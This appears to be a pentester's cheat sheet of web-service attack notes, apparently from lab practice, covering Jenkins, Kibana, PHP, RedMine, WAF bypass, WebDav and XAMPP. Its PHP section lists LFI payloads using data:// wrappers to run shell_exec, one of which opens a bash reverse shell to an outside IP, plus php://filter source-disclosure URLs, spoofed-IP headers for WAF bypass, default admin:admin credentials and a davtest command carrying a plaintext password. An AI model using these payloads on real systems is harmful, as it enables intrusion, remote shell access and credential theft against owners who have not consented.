# HTTP

### Grafana
check LFI vuln
### IIS
• check index.<extension>
• check default.<extension>
### Jenkins
* https://book.hacktricks.xyz/cloud-security/jenkins
* https://github.com/gquere/pwn_jenkins

Check version leak: http://172.16.1.19:8080/oops
http://172.16.1.19:8080/whoAmI/
/api/json?pretty=true
/asynchPeople/api/xml?depth=1 # list of users

/securityRealm/createAccount -> SecLists Web-Content -> Jenkins
### Kibana / Elasticsearch
- check PG Sirol
https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2
RCE vulnerability in 2019 for Kibana versions < 6.6.0
https://github.com/Cr4ckC4t/cve-2019-7609

- get kibana version ->

log in kibana dashboard -> Dev Tools -> Console
change query to "GET /"
### Obfuscated JavaScript
http://www.jsnice.org
http://codeamaze.com/code-beautifier/javascript-deobfuscator (oscp gh0st)
### PHP
* With LFI/RFI -> check filters
GET /section.php?page=data://text/plain;base64,<?php echo shell_exec("whoami"); ?> HTTP/1.1
http://192.168.104.53:8080/site/index.php?page=data://text/plain,%3C?php%20echo%20shell_exec(%22whoami%22);%20?%3E
GET /section.php?page=data://text/plain;base64,<?php echo shell_exec("bash -i >& /dev/tcp/192.168.119.235/443 0>&1"); ?> HTTP/1.1

* php filters
http://192.168.243.58/image.php?img=php://filter/convert.base64-encode/resource=/proc/self/cwd/image.php

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-data
### RedMine
default login: admin:admin

RCE -> CVE-2019-18890 3.2.9 and 3.3.x before 3.3.10
### Tomcat
### WAF
https://portswigger.net/bappstore/ae2611da3bbc4687953a1f4ba6a4e04c

check PG/xposedapi

• X-Originating-IP: 127.0.0.1
• X-Forwarded-For: 127.0.0.1
• X-Remote-IP: 127.0.0.1
• X-Remote-Addr: 127.0.0.1

### WebDav
- cadaver
- davtest (check extension upload)

davtest -url http://$IP -auth 'fmcsorley:CrabSharkJellyfish192'

cadaver $IP
### XAMPP


--- With LFI
C:\\xampp\\mysql\\bin\\my.ini
C:\\xampp\\phpmyadmin\\config.inc.php
